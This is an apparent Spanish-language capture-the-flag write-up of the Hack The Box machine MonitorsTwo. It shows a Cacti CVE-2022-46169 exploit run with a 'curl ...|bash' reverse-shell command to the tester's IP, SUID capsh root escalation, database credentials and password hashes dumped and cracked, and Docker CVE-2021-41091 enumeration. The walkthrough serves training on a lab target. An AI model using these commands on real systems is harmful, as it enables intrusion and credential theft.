This page looks best with JavaScript enabled

Hack The Box - MonitorsTwo

 •  ✍️ sckull
featured image

MonitorsTwo corre una version de Cacti vulnerable que nos permitio acceder a un contenedor de docker donde escalamos privilegios con el comando capsh, dentro, descubirmos credenciales de la base de datos de Cacti que nos permitio acceder a un primer usuario. Escalamos privilegios a traves de una vulnerabilidad presente en la version de docker.

Nombre MonitorsTwo box_img_maker
OS

Linux

Puntos 20
Dificultad Facil
IP 10.10.11.211
Maker

TheCyberGeek
Matrix 
{
   "type":"radar",
   "data":{
      "labels":["Enumeration","Real-Life","CVE","Custom Explotation","CTF-Like"],
      "datasets":[
         {
            "label":"User Rate",  "data":[0, 0, 0, 0, 0],
            "backgroundColor":"rgba(75, 162, 189,0.5)",
            "borderColor":"#4ba2bd"
         },
         {
            "label":"Maker Rate",
            "data":[0, 0, 0, 0, 0],
            "backgroundColor":"rgba(154, 204, 20,0.5)",
            "borderColor":"#9acc14"
         }
      ]
   },
    "options": {"scale": {"ticks": {"backdropColor":"rgba(0,0,0,0)"},
            "angleLines":{"color":"rgba(255, 255, 255,0.6)"},
            "gridLines":{"color":"rgba(255, 255, 255,0.6)"}
        }
    }
}

Recon

nmap

nmap muestra multiples puertos abiertos: http (80) y ssh (22).

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17

# Nmap 7.93 scan initiated Sun Apr 30 17:02:10 2023 as: nmap -p22,80 -sV -sC -oN nmap_scan 10.129.79.180
Nmap scan report for 10.129.79.180
Host is up (0.15s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 48add5b83a9fbcbef7e8201ef6bfdeae (RSA)
|   256 b7896c0b20ed49b2c1867c2992741c1f (ECDSA)
|_  256 18cd9d08a621a8b8b6f79f8d405154fb (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Login to Cacti
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Apr 30 17:02:24 2023 -- 1 IP address (1 host up) scanned in 13.81 seconds

Web Site

Al visitar el sitio, nos muestra el panel de login de Cacti en su version 1.2.22.

image

Container User - www-data

Encontramos que existe una vulnerabilidad que permite la ejecucion remota de comandos en la version de Cacti 1.2.22 CVE-2022-46169 la cual se describe en el post Cacti: Unauthenticated Remote Code Execution.

Con el PoC ejecutamos una shell inversa utilizando shells

1
2

 π CVE-2022-46169 main ❯ python3 CVE-2022-46169.py http://10.10.11.211/ -c 'curl 10.10.14.180:8000/10.10.14.180:1335|bash'
[*] Trying for 1 - 100 host ids

Por otra parte logramos obtener una shell como www-data.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10

 π ~/htb/monitorstwo ❯ rlwrap nc -lvp 1335
listening on [any] 1335 ...
10.129.79.180: inverse host lookup failed: Unknown host
connect to [10.10.15.5] from (UNKNOWN) [10.129.79.180] 55506
can't access tty; job control turned off
$ whoami;id;pwd
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/var/www/html
$

Al movernos por la raiz encontramos que se trata de un contenedor de docker, ya que existe el archivo .dockerenv.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26

$ ls -lah /
total 100K
drwxr-xr-x   1 root root 4.0K Mar 21 10:49 .
drwxr-xr-x   1 root root 4.0K Mar 21 10:49 ..
-rwxr-xr-x   1 root root    0 Mar 21 10:49 .dockerenv
drwxr-xr-x   1 root root 4.0K Mar 22 13:21 bin
drwxr-xr-x   2 root root 4.0K Mar 22 13:21 boot
drwxr-xr-x   5 root root  340 May  4 00:28 dev
-rw-r--r--   1 root root  648 Jan  5 11:37 entrypoint.sh
drwxr-xr-x   1 root root 4.0K Mar 21 10:49 etc
drwxr-xr-x   2 root root 4.0K Mar 22 13:21 home
drwxr-xr-x   1 root root 4.0K Nov 15 04:13 lib
drwxr-xr-x   2 root root 4.0K Mar 22 13:21 lib64
drwxr-xr-x   2 root root 4.0K Mar 22 13:21 media
drwxr-xr-x   2 root root 4.0K Mar 22 13:21 mnt
drwxr-xr-x   2 root root 4.0K Mar 22 13:21 opt
dr-xr-xr-x 289 root root    0 May  4 00:28 proc
drwx------   1 root root 4.0K Mar 21 10:50 root
drwxr-xr-x   1 root root 4.0K Nov 15 04:17 run
drwxr-xr-x   1 root root 4.0K Jan  9 09:30 sbin
drwxr-xr-x   2 root root 4.0K Mar 22 13:21 srv
dr-xr-xr-x  13 root root    0 May  4 00:28 sys
drwxrwxrwt   1 root root  20K May  4 00:51 tmp
drwxr-xr-x   1 root root 4.0K Nov 14 00:00 usr
drwxr-xr-x   1 root root 4.0K Nov 15 04:13 var
$

Container Privesc - Root

Tras ejecutar una busqueda de ficheros con permisos SUID encontramos capsh, GTFOBins nos permitio escalar privilegios.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13

$ find / -perm -4000 2>/dev/null
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/sbin/capsh
/bin/mount
/bin/umount
/bin/su
$ capsh --gid=0 --uid=0 --
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)

Cacti DB

En la raiz tambien encontramos el archivo entrypoint.sh el cual contiene las credenciales de acceso para la base de datos de cacti.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18

cat entrypoint.sh
#!/bin/bash
set -ex

wait-for-it db:3306 -t 300 -- echo "database is connected"
if [[ ! $(mysql --host=db --user=root --password=root cacti -e "show tables") =~ "automation_devices" ]]; then
    mysql --host=db --user=root --password=root cacti < /var/www/html/cacti.sql
    mysql --host=db --user=root --password=root cacti -e "UPDATE user_auth SET must_change_password='' WHERE username = 'admin'"
    mysql --host=db --user=root --password=root cacti -e "SET GLOBAL time_zone = 'UTC'"
fi

chown www-data:www-data -R /var/www/html
# first arg is `-f` or `--some-option`
if [ "${1#-}" != "$1" ]; then
	set -- apache2-foreground "$@"
fi

exec "$@"

Utilizando las credenciales enumeramos los usuarios registrados, observamos el hash de tres de ellos.

1
2
3
4
5
6

mysql --host=db --user=root --password=root -e 'use cacti;select * from user_auth;'
id	username	password	realm	full_name	email_address	must_change_password	password_change	show_tree	show_list	show_preview	graph_settings	login_opts	policy_graphs	policy_trees	policy_hosts	policy_graph_templates	enabled	lastchange	lastlogin	password_history	locked	failed_attempts	lastfail	reset_perms
1	admin	$2y$10$IhEA.Og8vrvwueM7VEDkUes3pwc3zaBbQ/iuqMft/llx8utpR1hjC	0	Jamie Thompson	admin@monitorstwo.htb		on	on	on	on	on	2	1	11	1	on	-1	-1	-1		0	0	663348655
3	guest	43e9a4ab75570f5b	0	Guest Account		on	on	on	on	on	3	1	1	1	1	1		-1	-1	-1	00	0
4	marcus	$2y$10$vcrYth5YcCLlZaPDj6PwqOYTw68W1.3WeKlBn70JonsdW/MhFYK4C	0	Marcus Brune	marcus@monitorstwo.htb			on	on	on	on	1	1	11	1	on	-1	-1		on	0	0	2135691668
$

John - Crack the Hash

Ejecutamos John sobre los hashes, logramos encontrar uno.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11

 π ~/htb/monitorstwo ❯ john --wordlist=$ROCK hash_marcus
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
funkymonkey      (?)
1g 0:00:01:12 DONE (2023-04-30 17:16) 0.01385g/s 118.2p/s 118.2c/s 118.2C/s 474747..coucou
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
 π ~/htb/monitorstwo ❯

User - Marcus

Intentamos ingresar por SSH como marcus, logrando obtener una shell y la flag user.txt.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47

 π ~/htb/monitorstwo ❯ ssh marcus@10.129.79.180 # funkymonkey
The authenticity of host '10.129.79.180 (10.129.79.180)' can't be established.
ED25519 key fingerprint is SHA256:RoZ8jwEnGGByxNt04+A/cdluslAwhmiWqG3ebyZko+A.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.79.180' (ED25519) to the list of known hosts.
marcus@10.129.79.180's password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-147-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sun 30 Apr 2023 09:17:16 PM UTC

  System load:                      0.0
  Usage of /:                       63.1% of 6.73GB
  Memory usage:                     14%
  Swap usage:                       0%
  Processes:                        233
  Users logged in:                  0
  IPv4 address for br-60ea49c21773: 172.18.0.1
  IPv4 address for br-7c3b7c0d00b3: 172.19.0.1
  IPv4 address for docker0:         172.17.0.1
  IPv4 address for eth0:            10.129.79.180
  IPv6 address for eth0:            dead:beef::250:56ff:fe96:bd15


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


You have mail.
Last login: Thu Mar 23 10:12:28 2023 from 10.10.14.40
marcus@monitorstwo:~$ whoami;id;pwd
marcus
uid=1000(marcus) gid=1000(marcus) groups=1000(marcus)
/home/marcus
marcus@monitorstwo:~$ ls
user.txt
marcus@monitorstwo:~$ cat user.txt
328209fe85317c7a89aa5fa60953ea8a
marcus@monitorstwo:~$

Privesc

Tras enumerar los directorios encontramos un correo para el usuario marcus donde se detallan ditintas vulnerabilidades que deben de ser mitigadas.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29

marcus@monitorstwo:/var$ ls -lah mail
total 12K
drwxrwsr-x  2 root mail 4.0K Mar 22 11:46 .
drwxr-xr-x 13 root root 4.0K Jan  9 10:03 ..
-rw-r--r--  1 root mail 1.8K Oct 18  2021 marcus
marcus@monitorstwo:/var$ cat mail/marcus
From: administrator@monitorstwo.htb
To: all@monitorstwo.htb
Subject: Security Bulletin - Three Vulnerabilities to be Aware Of

Dear all,

We would like to bring to your attention three vulnerabilities that have been recently discovered and should be addressed as soon as possible.

CVE-2021-33033: This vulnerability affects the Linux kernel before 5.11.14 and is related to the CIPSO and CALIPSO refcounting for the DOI definitions. Attackers can exploit this use-after-free issue to write arbitrary values. Please update your kernel to version 5.11.14 or later to address this vulnerability.

CVE-2020-25706: This cross-site scripting (XSS) vulnerability affects Cacti 1.2.13 and occurs due to improper escaping of error messages during template import previews in the xml_path field. This could allow an attacker to inject malicious code into the webpage, potentially resulting in the theft of sensitive data or session hijacking. Please upgrade to Cacti version 1.2.14 or later to address this vulnerability.

CVE-2021-41091: This vulnerability affects Moby, an open-source project created by Docker for software containerization. Attackers could exploit this vulnerability by traversing directory contents and executing programs on the data directory with insufficiently restricted permissions. The bug has been fixed in Moby (Docker Engine) version 20.10.9, and users should update to this version as soon as possible. Please note that running containers should be stopped and restarted for the permissions to be fixed.

We encourage you to take the necessary steps to address these vulnerabilities promptly to avoid any potential security breaches. If you have any questions or concerns, please do not hesitate to contact our IT department.

Best regards,

Administrator
CISO
Monitor Two
Security Team
marcus@monitorstwo:/var$

CVE-2021-41091

La mas notable es CVE-2021-41091 en la cual menciona la version 20.10.9 de docker, es decir versiones anteriores son vulnerables. Si observamos la version de la maquina posiblemente sea vulnerable.

1
2
3

marcus@monitorstwo:~$ docker --version
Docker version 20.10.5+dfsg1, build 55c4c88
marcus@monitorstwo:~$

Citamos parte de la explicacion de la vulnerabilidad CVE-2021-41091.

.. A bug was found in Moby (Docker Engine) where the data directory (typically /var/lib/docker) contained subdirectories with insufficiently restricted permissions, allowing otherwise unprivileged Linux users to traverse directory contents and execute programs. ..

Se menciona que el directorio de docker /var/lib/docker puede tener permisos de restriccion insuficientes lo que podria permitir a usuarios de nivel bajo acceder al contenido y ejecutar programas. Sin embargo al analizar este directorio se observa que no tenemos permisos de ningun tipo.

1
2
3
4
5

marcus@monitorstwo:~$ ls -lah /var/lib/docker
ls: cannot open directory '/var/lib/docker': Permission denied
marcus@monitorstwo:~$ find /var/lib/docker/ -type d,f 2>/dev/null
/var/lib/docker/
marcus@monitorstwo:~$

Si observamos la estructura localmente vemos que podemos encontrar informacion incluso de los contenedores si observamos la carpeta containers/.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31

┌──(root㉿kali)-[/var/lib/docker]
└─# ls -lah
total 52K
drwx--x--- 13 root root 4.0K May  3 21:00 .
drwxr-xr-x 74 root root 4.0K May  3 21:00 ..
drwx--x--x  4 root root 4.0K May  3 21:00 buildkit
drwx--x---  8 root root 4.0K May  3 21:04 containers
drwx------  3 root root 4.0K May  3 21:00 image
drwxr-x---  3 root root 4.0K May  3 21:00 network
drwx--x--- 16 root root 4.0K May  3 21:04 overlay2
drwx------  4 root root 4.0K May  3 21:00 plugins
drwx------  2 root root 4.0K May  3 21:00 runtimes
drwx------  2 root root 4.0K May  3 21:00 swarm
drwx------  2 root root 4.0K May  3 21:01 tmp
drwx------  2 root root 4.0K May  3 21:00 trust
drwx-----x  2 root root 4.0K May  3 21:00 volumes

┌──(root㉿kali)-[/var/lib/docker]
└─# ls -lah containers
total 32K
drwx--x---  8 root root 4.0K May  3 21:04 .
drwx--x--- 13 root root 4.0K May  3 21:00 ..
drwx--x---  4 root root 4.0K May  3 21:01 3d771b3e220ad3d2c4004ebfac7ffb1f37da0dba38b75d0f1e47c2b3d56abb71
drwx--x---  4 root root 4.0K May  3 21:02 60f34c8fc70c7450e38165b0b48d419c7b16fa2cb31c2c8edf8293475a04ec13
drwx--x---  4 root root 4.0K May  3 21:04 c6c33aefdaa77e33f0c81e4810d1073a3f31c13694eb3a1d31349e0d8837a219
drwx--x---  4 root root 4.0K May  3 21:05 e490db1d1e6fe026f815d0154d02309bc308d01d4c2e2d73251e1886ce67a168
drwx--x---  4 root root 4.0K May  3 21:02 ea96ae8ab58b7117b612dfff8aabe1cfd8075a210f1fc6e1b4d8f48a5900f119
drwx--x---  4 root root 4.0K May  3 21:01 f6ab86f78ecfcd108099b654cadc95a8a318eb7ea1196378d32382720a6d0a1d

┌──(root㉿kali)-[/var/lib/docker]
└─#

De la misma forma que vemos el contenido localmente, probablemente sea la misma en la maquina, en el caso de la maquina debemos de obtener el ID completo del contanier para poder acceder al directorio del contenedor.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49

┌──(root㉿kali)-[/var/lib/docker/containers]
└─# ls -lah
total 32K
drwx--x---  8 root root 4.0K May  3 21:04 .
drwx--x--- 13 root root 4.0K May  3 21:00 ..
drwx--x---  4 root root 4.0K May  3 21:01 3d771b3e220ad3d2c4004ebfac7ffb1f37da0dba38b75d0f1e47c2b3d56abb71
drwx--x---  4 root root 4.0K May  3 21:02 60f34c8fc70c7450e38165b0b48d419c7b16fa2cb31c2c8edf8293475a04ec13
drwx--x---  4 root root 4.0K May  3 21:04 c6c33aefdaa77e33f0c81e4810d1073a3f31c13694eb3a1d31349e0d8837a219
drwx--x---  4 root root 4.0K May  3 21:05 e490db1d1e6fe026f815d0154d02309bc308d01d4c2e2d73251e1886ce67a168
drwx--x---  4 root root 4.0K May  3 21:02 ea96ae8ab58b7117b612dfff8aabe1cfd8075a210f1fc6e1b4d8f48a5900f119
drwx--x---  4 root root 4.0K May  3 21:01 f6ab86f78ecfcd108099b654cadc95a8a318eb7ea1196378d32382720a6d0a1d

┌──(root㉿kali)-[/var/lib/docker/containers]
└─# docker ps
CONTAINER ID   IMAGE     COMMAND     CREATED         STATUS         PORTS     NAMES
e490db1d1e6f   alpine    "/bin/sh"   6 minutes ago   Up 6 minutes             modest_mirzakhani

┌──(root㉿kali)-[/var/lib/docker/containers]
└─# cd e490db1d1e6f*

┌──(root㉿kali)-[/var/lib/docker/containers/e490db1d1e6fe026f815d0154d02309bc308d01d4c2e2d73251e1886ce67a168]
└─# ls -lah
total 48K
drwx--x--- 4 root root 4.0K May  3 21:05 .
drwx--x--- 8 root root 4.0K May  3 21:04 ..
drwx------ 2 root root 4.0K May  3 21:04 checkpoints
-rw------- 1 root root 2.6K May  3 21:05 config.v2.json
-rw-r----- 1 root root 6.7K May  3 21:05 e490db1d1e6fe026f815d0154d02309bc308d01d4c2e2d73251e1886ce67a168-json.log
-rw-r--r-- 1 root root 1.5K May  3 21:05 hostconfig.json
-rw-r--r-- 1 root root   13 May  3 21:04 hostname
-rw-r--r-- 1 root root  174 May  3 21:04 hosts
drwx--x--- 2 root root 4.0K May  3 21:04 mounts
-rw-r--r-- 1 root root   53 May  3 21:04 resolv.conf
-rw-r--r-- 1 root root   71 May  3 21:04 resolv.conf.hash

┌──(root㉿kali)-[/var/lib/docker/containers/e490db1d1e6fe026f815d0154d02309bc308d01d4c2e2d73251e1886ce67a168]
└─# ls -lah checkpoints
total 8.0K
drwx------ 2 root root 4.0K May  3 21:04 .
drwx--x--- 4 root root 4.0K May  3 21:05 ..

┌──(root㉿kali)-[/var/lib/docker/containers/e490db1d1e6fe026f815d0154d02309bc308d01d4c2e2d73251e1886ce67a168]
└─# ls -lah mounts
total 8.0K
drwx--x--- 2 root root 4.0K May  3 21:04 .
drwx--x--- 4 root root 4.0K May  3 21:05 ..

┌──(root㉿kali)-[/var/lib/docker/containers/e490db1d1e6fe026f815d0154d02309bc308d01d4c2e2d73251e1886ce67a168]
└─#

Para obtener informacion del contenedor ejecutamos cdk en el contenedor.

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157

./cdk  eva --full
CDK (Container DucK)
CDK Version(GitCommit): d9ab55702036c28e793378cc47605e21206dfef1
Zero-dependency cloudnative k8s/docker/serverless penetration toolkit by cdxy & neargle
Find tutorial, configuration and use-case in https://github.com/cdk-team/CDK/

[  Information Gathering - System Info  ]
2023/05/02 01:05:58 current dir: /tmp
2023/05/02 01:05:58 current user: root uid: 0 gid: 0 home: /root
2023/05/02 01:05:58 hostname: 50bca5e748b0
2023/05/02 01:05:58 debian debian 11.5 kernel: 5.4.0-147-generic
2023/05/02 01:05:58 Setuid files found:
    /usr/bin/chfn
    /usr/bin/chsh
    /usr/bin/gpasswd
    /usr/bin/newgrp
    /usr/bin/passwd
    /sbin/capsh
    /bin/mount
    /bin/su
    /bin/umount

[  Information Gathering - Services  ]
2023/05/02 01:05:58 service found in process:
    14230   1   perl
2023/05/02 01:05:58 service found in process:
    14573   1   perl
2023/05/02 01:05:58 service found in process:
    32773   1   perl

[  Information Gathering - Commands and Capabilities  ]
2023/05/02 01:05:58 available commands:
    curl,wget,find,ps,php,apt,dpkg,apache2,mysql,capsh,mount,gcc,g++,make,base64,perl
2023/05/02 01:05:58 Capabilities hex of Caps(CapInh|CapPrm|CapEff|CapBnd|CapAmb):
    CapInh: 00000000a00425f9
    CapPrm: 00000000a00425f9
    CapEff: 00000000a00425f9
    CapBnd: 00000000a00425f9
    CapAmb: 0000000000000000
    Cap decode: 0x00000000a00425f9 = CAP_CHOWN,CAP_FOWNER,CAP_FSETID,CAP_KILL,CAP_SETGID,CAP_SETUID,CAP_SETPCAP,CAP_NET_BIND_SERVICE,CAP_NET_RAW,CAP_SYS_CHROOT,CAP_AUDIT_WRITE,CAP_SETFCAP
[*] Maybe you can exploit the Capabilities below:

[  Information Gathering - Mounts  ]
0:62 / / rw,relatime - overlay overlay rw,lowerdir=/var/lib/docker/overlay2/l/4Z77R4WYM6X4BLW7GXAJOAA4SJ:/var/lib/docker/overlay2/l/Z4RNRWTZKMXNQJVSRJE4P2JYHH:/var/lib/docker/overlay2/l/CXAW6LQU6QOKNSSNURRN2X4JEH:/var/lib/docker/overlay2/l/YWNFANZGTHCUIML4WUIJ5XNBLJ:/var/lib/docker/overlay2/l/JWCZSRNDZSQFHPN75LVFZ7HI2O:/var/lib/docker/overlay2/l/DGNCSOTM6KEIXH4KZVTVQU2KC3:/var/lib/docker/overlay2/l/QHFZCDCLZ4G4OM2FLV6Y2O6WC6:/var/lib/docker/overlay2/l/K5DOR3JDWEJL62G4CATP62ONTO:/var/lib/docker/overlay2/l/FGHBJKAFBSAPJNSTCR6PFSQ7ER:/var/lib/docker/overlay2/l/PDO4KALS2ULFY6MGW73U6QRWSS:/var/lib/docker/overlay2/l/MGUNUZVTUDFYIRPLY5MR7KQ233:/var/lib/docker/overlay2/l/VNOOF2V3SPZEXZHUKR62IQBVM5:/var/lib/docker/overlay2/l/CDCPIX5CJTQCR4VYUUTK22RT7W:/var/lib/docker/overlay2/l/G4B75MXO7LXFSK4GCWDNLV6SAQ:/var/lib/docker/overlay2/l/FRHKWDF3YAXQ3LBLHIQGVNHGLF:/var/lib/docker/overlay2/l/ZDJ6SWVJF6EMHTTO3AHC3FH3LD:/var/lib/docker/overlay2/l/W2EMLMTMXN7ODPSLB2FTQFLWA3:/var/lib/docker/overlay2/l/QRABR2TMBNL577HC7DO7H2JRN2:/var/lib/docker/overlay2/l/7IGVGYP6R7SE3WFLYC3LOBPO4Z:/var/lib/docker/overlay2/l/67QPWIAFA4NXFNM6RN43EHUJ6Q,upperdir=/var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/diff,workdir=/var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/work,xino=off
0:65 / /proc rw,nosuid,nodev,noexec,relatime - proc proc rw
0:66 / /dev rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755
0:67 / /dev/pts rw,nosuid,noexec,relatime - devpts devpts rw,gid=5,mode=620,ptmxmode=666
0:68 / /sys ro,nosuid,nodev,noexec,relatime - sysfs sysfs ro
0:69 / /sys/fs/cgroup rw,nosuid,nodev,noexec,relatime - tmpfs tmpfs rw,mode=755
0:31 /docker/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e /sys/fs/cgroup/systemd ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,xattr,name=systemd
0:34 /docker/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e /sys/fs/cgroup/cpuset ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,cpuset
0:35 /docker/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e /sys/fs/cgroup/devices ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,devices
0:36 /docker/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e /sys/fs/cgroup/hugetlb ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,hugetlb
0:37 /docker/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e /sys/fs/cgroup/pids ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,pids
0:38 /docker/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e /sys/fs/cgroup/perf_event ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,perf_event
0:39 /docker/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e /sys/fs/cgroup/cpu,cpuacct ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,cpu,cpuacct
0:40 /docker/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e /sys/fs/cgroup/blkio ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,blkio
0:41 /docker/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e /sys/fs/cgroup/net_cls,net_prio ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,net_cls,net_prio
0:42 /docker/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e /sys/fs/cgroup/memory ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,memory
0:43 /docker/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e /sys/fs/cgroup/freezer ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,freezer
0:44 /docker/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e /sys/fs/cgroup/rdma ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,rdma
0:64 / /dev/mqueue rw,nosuid,nodev,noexec,relatime - mqueue mqueue rw
8:2 /root/cacti/entrypoint.sh /entrypoint.sh rw,relatime - ext4 /dev/sda2 rw
8:2 /var/lib/docker/containers/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e/resolv.conf /etc/resolv.conf rw,relatime - ext4 /dev/sda2 rw
8:2 /var/lib/docker/containers/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e/hostname /etc/hostname rw,relatime - ext4 /dev/sda2 rw
8:2 /var/lib/docker/containers/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e/hosts /etc/hosts rw,relatime - ext4 /dev/sda2 rw
0:63 / /dev/shm rw,nosuid,nodev,noexec,relatime - tmpfs shm rw,size=65536k
0:65 /bus /proc/bus ro,nosuid,nodev,noexec,relatime - proc proc rw
0:65 /fs /proc/fs ro,nosuid,nodev,noexec,relatime - proc proc rw
0:65 /irq /proc/irq ro,nosuid,nodev,noexec,relatime - proc proc rw
0:65 /sys /proc/sys ro,nosuid,nodev,noexec,relatime - proc proc rw
0:65 /sysrq-trigger /proc/sysrq-trigger ro,nosuid,nodev,noexec,relatime - proc proc rw
0:70 / /proc/acpi ro,relatime - tmpfs tmpfs ro
0:66 /null /proc/kcore rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755
0:66 /null /proc/keys rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755
0:66 /null /proc/timer_list rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755
0:66 /null /proc/sched_debug rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755
0:71 / /proc/scsi ro,relatime - tmpfs tmpfs ro
0:72 / /sys/firmware ro,relatime - tmpfs tmpfs ro

[  Information Gathering - Net Namespace  ]
    container net namespace isolated.

[  Information Gathering - Sysctl Variables  ]
2023/05/02 01:05:58 net.ipv4.conf.all.route_localnet = 0

[  Information Gathering - DNS-Based Service Discovery  ]
error when requesting coreDNS: lookup any.any.svc.cluster.local. on 127.0.0.11:53: server misbehaving
error when requesting coreDNS: lookup any.any.any.svc.cluster.local. on 127.0.0.11:53: server misbehaving

[  Discovery - K8s API Server  ]
2023/05/02 01:05:58 checking if api-server allows system:anonymous request.
err found while searching local K8s apiserver addr.:
err: cannot find kubernetes api host in ENV
    api-server forbids anonymous request.
    response:

[  Discovery - K8s Service Account  ]
load K8s service account token error.:
open /var/run/secrets/kubernetes.io/serviceaccount/token: no such file or directory

[  Discovery - Cloud Provider Metadata API  ]
2023/05/02 01:05:59 failed to dial Alibaba Cloud API.
2023/05/02 01:06:00 failed to dial Azure API.
2023/05/02 01:06:01 failed to dial Google Cloud API.
2023/05/02 01:06:02 failed to dial Tencent Cloud API.
2023/05/02 01:06:03 failed to dial OpenStack API.
2023/05/02 01:06:04 failed to dial Amazon Web Services (AWS) API.
2023/05/02 01:06:05 failed to dial ucloud API.

[  Exploit Pre - Kernel Exploits  ]
2023/05/02 01:06:05 refer: https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2021-27365] linux-iscsi

   Details: https://blog.grimm-co.com/2021/03/new-old-bugs-in-linux-kernel.html
   Exposure: less probable
   Tags: RHEL=8
   Download URL: https://codeload.github.com/grimm-co/NotQuite0DayFriday/zip/trunk
   Comments: CONFIG_SLAB_FREELIST_HARDENED must not be enabled

[+] [CVE-2021-22555] Netfilter heap out-of-bounds write

   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: less probable
   Tags: ubuntu=20.04{kernel:5.8.0-*}
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded



[  Information Gathering - Sensitive Files  ]
    .dockerenv - /.dockerenv
    /.bashrc - /etc/skel/.bashrc
    /.bash_history - /root/.bash_history
    /.bashrc - /root/.bashrc

[  Information Gathering - ASLR  ]
2023/05/02 01:06:07 /proc/sys/kernel/randomize_va_space file content: 2
